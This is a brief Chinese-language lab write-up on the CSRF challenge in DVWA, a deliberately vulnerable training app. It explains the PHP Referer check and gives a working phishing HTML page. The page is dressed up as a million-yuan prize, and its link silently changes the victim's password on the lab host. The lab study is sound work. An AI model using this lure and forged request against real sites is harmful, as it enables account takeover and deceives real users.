1代码分析
过滤条件
if( stripos( $SERVER[ 'HTTP_REFERER' ] ,$SERVER[ 'SERVER_NAME' ]) !== false )
判断,$SERVER[ 'SERVER_NAME' ]在 $SERVER[ 'HTTP_REFERER' ] 中是否存在,寻找第一次出现的地址
$_SERVER[ ' SERVER_NAME' ] 网站的地址 192.168.0.9
$_SERVER[ 'HTTP_REFERER' ] 请求发起着地址 192.168.0.9(靶场地址)若从黑客构造的钓鱼网站跳转的,显示的是黑客攻击机的地址
2正常构造一个CSRF
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>恭喜你,获得100万大奖,点击领取....</title>
</head>
<body>
<a href='http://192.168.0.9/DVWA-master/vulnerabilities/csrf/?
password_new=123456&password_conf=123456&Change=Change'>点击领取百万大奖</a>
</body>
</html>
WIN10-浏览器访问